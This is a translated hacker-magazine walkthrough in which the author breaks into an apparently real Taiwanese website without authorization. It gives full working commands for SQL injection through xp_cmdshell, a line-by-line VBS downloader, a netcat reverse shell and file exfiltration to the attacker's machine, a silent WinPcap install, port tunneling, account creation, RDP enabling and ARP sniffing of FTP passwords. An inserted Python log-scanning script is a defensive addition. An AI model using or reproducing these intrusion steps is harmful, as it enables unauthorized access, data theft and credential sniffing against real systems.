Source: Security
It had been a long time since the last China-Taiwan flare-up and my hands were itching, so I casually browsed a few Taiwanese sites looking for a small site to play with, and found this one.
Out of habit, I typed a single quote into the "Register Account" field, and got:
/rdshow/modify.asp, line 5
An injection vulnerability seemed to exist, so let's see what permissions it runs with. Continuing, I entered ' and user>0 and l'=' into the login field, and a problem appeared: the input could not be completed. The site seems to limit the input length, which made things harder for me. So I saved the page and changed two places in its source code: one was changing Action=modify.asp into Action=
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value 'dbo' to a column of data type int.
/rdshow/modify.asp, line 5
The result was what I expected, but injecting this way is too much trouble. Looking at the page source, it is far more convenient to turn the form-based injection point into a URL-based one. Another advantage of this transformation is that you can then use injection tools such as NBSI, which greatly simplifies the injection process. The transformed URL is modify.asp?bidno=fuck. WEB and SQL servers are now often split across separate hosts, so first let's find the IP address of the database. Open Skynet (the personal firewall), then submit in IE:
master.dbo.xp_cmdshell 'ping myip';--
From Skynet's alarm log I could see the database's IP address was 210.208.xxx.253. Pinging www.xxx.org.tw again gave 210.208.xxx.32, so the database and the WEB server are not on the same host, but judging from the IP allocation the two hosts are on the same network segment. In theory, once we take the database host, penetrating to the WEB server should not be difficult (which later turned out to be the case). At this point I first used Superscan to scan which ports the database host had open.
Tip: scanning the database server first has many benefits, such as detecting whether the other side has a firewall and whether it runs FTP or WEB services, in order to decide how to proceed with the injection.
The scan showed the database host has a firewall. My first thought was to upload NC and get a reverse shell. I tried many ways to get it up there: TFTP did not work, and FTP did not work either. If the database host ran a WEB service I could have written a WebShell, but unfortunately it did not. So I had no choice but to write Iget.vbs (script kiddie: advertising time! The Hacker Defence download system opened last month at www.hacker.com.cn/downweb/index.asp; there are some quite good little tools there too, so feel free to download and use them, and recommend any programs you find useful) and have the other side's server download my NC. Having decided on that, I continued submitting in IE:
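As an added detection example (not part of the original post): the injection above is driven entirely through a GET parameter that the ASP page concatenates into T-SQL, so each step leaves a line in the web server log. The following Python scans constructed IIS W3C log lines for the `xp_cmdshell` / `user>0` style payloads described above; the field order, paths and IP addresses are assumptions made for the example.

```python
"""Flag SQL-injection attempts that reach for xp_cmdshell in IIS W3C-style logs."""
import re
from urllib.parse import unquote_plus

# Indicators taken from the walkthrough: the stacked-query call to
# master.dbo.xp_cmdshell, the ';--' comment terminator, and the 'user>0' probe.
SUSPICIOUS = re.compile(
    r"(xp_cmdshell|master\.dbo\.|;\s*--|'\s*and\s+user\s*>\s*0)",
    re.IGNORECASE,
)

def decode_query(raw: str) -> str:
    """URL-decode repeatedly (up to 3 rounds) so double-encoded payloads are still seen."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur

def scan_line(line: str):
    """Return (client_ip, uri_stem, decoded_query) for a suspicious request, else None."""
    if line.startswith("#"):
        return None  # W3C header/comment line
    fields = line.split()
    if len(fields) < 7:
        return None
    # assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    _date, _time, c_ip, _method, stem, query, _status = fields[:7]
    decoded = decode_query(query)
    return (c_ip, stem, decoded) if SUSPICIOUS.search(decoded) else None

def scan_log(lines):
    """Scan every line and return the list of hits in log order."""
    return [hit for hit in (scan_line(l) for l in lines) if hit]

# Constructed sample log (documentation IPs, not real traffic).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2004-01-15 03:12:07 203.0.113.9 GET /rdshow/modify.asp bidno=1001 200",
    "2004-01-15 03:12:40 203.0.113.9 GET /rdshow/modify.asp bidno=1001'+and+user>0+and+'1'='1 500",
    "2004-01-15 03:15:02 203.0.113.9 GET /rdshow/modify.asp bidno=1001%3Bexec+master.dbo.xp_cmdshell+%27ping+203.0.113.9%27%3B-- 500",
    "2004-01-15 03:16:11 198.51.100.4 GET /rdshow/list.asp page=2 200",
]

if __name__ == "__main__":
    for ip, stem, q in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> {q}")
```

The two hits come from the same client against modify.asp, which is the pattern a defender would then use to pull the full request history for that address.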
master.dbo.xp_cmdshell 'echo iLocal = LCase(WScript.Arguments(1)) > c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo iRemote = LCase(WScript.Arguments(0)) >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo Set xPost = CreateObject(Microsoft.XMLHTTP > c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo xPost.Send() >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo Set sGet = CreateObject(
master.dbo.xp_cmdshell 'echo sGet.Mode = 3 >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo sGet.Type = 1 >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo sGet.Open() >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo sGet.Write(xPost.responseBody) >> c:\winnt\system\p.vbs';--
master.dbo.xp_cmdshell 'echo sGet.SaveToFile iLocal, 2 >> c:\winnt\system\p.vbs';--
Now bring out NBSI2 and use its NB Command feature to check that the VBS was written successfully (NB's TreeList directory-listing tool would also work, but you have to wait a long time for results and I am impatient, so I chose the former).
We can see the VBS was generated successfully, so now we can use it to download backdoors, Trojans and the like. Without further ado, first get Tlist, NC and Kill over there. Continue submitting the following URLs in IE:
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs nc.exe';--
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs kill.exe';--
master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs tlist.exe';--
Now we can use the uploaded NC to get a reverse shell. First, listen on port 8000 with NC on my own machine:
nc.exe -l -v -p 8000
Then enter in IE:
master.dbo.xp_cmdshell 'c:\winnt\system\nc.exe -e cmd.exe myip 8000';--
And with that we got a CmdShell.
Why did I upload Tlist? Because I wanted to know which antivirus software the other side uses, so we can be targeted about it and not have everything we upload killed. Another reason is that when I first tried to get past the firewall I had called FTP on the other side, and to avoid arousing suspicion I had to Kill it, which means uploading Tlist to see its PID. Tlist showed that the other side uses Norton.
Tip: finding out the target's antivirus software after getting in is very helpful, because different antivirus products define signatures for hacking tools differently; Kingsoft not detecting some hacking tool does not mean you can get it past Norton, and vice versa.
Dizzy, I am a newbie: I only know how to find Rising's signatures, not Norton's, so I gave up on the idea of uploading a few reverse-connect Trojans. Poking around, I found a lot of database backups on the D drive, and I wanted to download them first. But a new problem came up again: TFTP and FTP could not be used, the other side has a hardware firewall, and Iget.vbs can only download, so there was no way to upload anything, and even if I could upload a reverse-connect Trojan the other side has antivirus, heh. Having run out of ideas, I thought of a buddy of mine; he should have some good stuff to solve this problem, right? I told him the situation, and he laughed and sent me a little tool he wrote himself: HttpPut. This tool can send the other side's files to your own computer, simple and convenient. Usage:
Usage: E:\HttpPut.exe [URL] [PutFilePath]
Sample: E:\HttpPut.exe c:\p.txt
I first sent over a few Word files and everything was normal, but when I got to the large database file it turned out to be unstable and the shell hung easily; I tried many times (sweat: by then there were X-odd cmd.exe processes on there, but luckily I had uploaded Tlist and Kill, so I killed the hung cmd.exe processes one by one).
With another problem in hand, I wanted to go to the major hacking sites to find the latest reverse-connect Trojans, but heaven was against me and after a long search I could not find a satisfactory one. Just as I was nearly in despair my eyes suddenly lit up: doesn't NC transfer files through firewalls? Why else would it be called the Swiss Army knife? It seems I had been riding the donkey while looking for it. NC's advanced usage includes a method for transferring files; the specific commands are as follows:
nc -vv -l -p port > path\file
nc -d myip port
The first command is entered on my own machine; note that the newly opened port must not already be in use. The second command is run on the chicken. We can look at the results of my run.
The file transferred normally and quite stably; it appears NC really is good. The database was downloaded successfully, but our task is not finished yet. ArpSniffer is simple to use, but you must install WinPcap, and WinPcap's problem is that its installer has a graphical interface; installing it from the command line is a tough one that gives many newbies a headache. So let me simply tell you how to install WinPcap from the command line; the specific method is as follows:
Taking WinPcap 3.0a as an example, by comparing file-system and registry snapshots before and after installation it is easy to understand the entire install process. Setting the uninstall part aside, there are three key files: Wpcap.dll, Packet.dll and Npf.sys. The first two go in the System32 directory, the third in System32\drivers. The registry change is the addition of a system service, NPF. Note that a system service (i.e. a driver) is not a Win32 service.
As a system service it adds a key not only under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services but also under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root, and by default only SYSTEM can modify the latter. Fortunately it does not need to be added by hand: WinPcap registers itself automatically when called, so you do not even have to touch the registry manually; WinPcap does all of it itself. Simply copying the three files to the appropriate locations is enough.
As an example, or to demonstrate how to modify the registry, it can in fact be done with an Inf file. Save the following as _wpcap_.inf:
[Version]
Signature="$WINDOWS NT$"
ErrorControl = 1
ServiceBinary = %12%\npf.sys
Then write a batch file, _wpcap_.bat:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32
copy wpcap.dll %SYSTEMROOT%\system32
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers
del npf.sys
:END
del %0
Then package all the files with WinRAR as a self-extracting exe. Another idea that is simpler and more convenient is to open Terminal Services on the database host, which makes both transferring files into the internal network and further penetration much easier. You may ask: even with permission to add accounts and open Terminal Services, how do you connect when the other side has a firewall? Oh, that problem is solved; I believe everyone knows VIDC-type software, whose role is to map a port of an internal-network IP onto the public network, so we only need to connect to the public IP to reach the internal network. Here I use a modified version of yyc's VIDC.
Tip: yyc's modified VIDC is split into a client and a server; the server side, Idc.exe, runs on a chicken with a public IP and communicates on default port 8080.
Just run it on the chicken and it is OK. The client consists of vIDCc.exe, vIDCc.DLL and xl.ini; it connects and binds ports automatically according to the INI configuration. The INI reads as follows:
Serverip = public network IP
Serverport = 8080
Cip = 127.0.0.1
Bport = 21 | 80 | 3389
Yport = 7779 | 7776 | 7778
First upload these with Iget.vbs, then add an account inside the CmdShell, then write a BAT to open 3389, and run vIDCc.exe after the other computer restarts. OK, done. We just connect to the chicken's port 7778 to access the data inside the network.
Oh, now we can install WinPcap through its graphical interface. We have complete control of the database, but the task is not finished; let's first see whether we can sniff the WEB server. First execute the following command:
tracert 210.208.xxx.32 (WEB server address)
The returned results looked promising, so with WinPcap installed I started ArpSniffer. The sniffing command:
Usage: ArpSniffer [/RESET]
Here I listened on port 21; the command is as follows:
Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c:\winnt\system\pass.txt 1
The next step is to wait, but the editor is pressing me for the article, so I cannot post the results; if you are interested, I will tell you next time. That is the end of this simple task. See you next issue!